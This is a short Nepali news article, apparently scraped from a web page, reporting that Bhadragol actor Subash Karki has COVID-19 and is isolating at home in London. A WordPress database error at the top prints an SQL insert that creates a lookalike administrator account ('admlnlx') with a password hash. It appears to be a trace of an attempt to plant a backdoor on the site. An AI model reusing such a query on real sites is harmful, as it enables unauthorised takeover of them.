WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxN8.j.3jy/pr81dteFR4sQKFOyhJA.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 09:10:02', '', 'admlnlx', 'admlnlx')
बैशाख १८, काठमाडौं –
हाँस्यटेलिशृंखला भद्रगोलमा ‘विलासे’को भूमिकामा अभिनय गर्दै आएका कलाकार सुवास कार्कीलाई कोरोना संक्रमण देखिएको छ ।
विगत २ वर्षदेखि लण्डनमा बस्दै आएका सुवासलाई हालै कोरोना संक्रमण भएको पुष्टी भएको अनलाइन खबर मा उल्लेख छ । उनलाई उनी बस्दै आएको घरमा नै आइसुलेसनमा राखिएको छ ।
कुमार कट्टेल ‘जिग्री’सँगको कुराकानीमा सुवासले आफ्नो स्वास्थ्यमा सुधार आइरहेको बताए । अहिले आफु पहिलाको भन्दा सहज महशुस हुन थालेको सुवासले बताएका थिए । सुवास परिवार परिवारसँगै लण्डनमा बस्दै आएका छन् । सुवासलाई कोरोना देखिएपछि उनको परिवारमा पनि डर थपिएको छ । सुवासका एक छोरा र एक छोरी छन् ।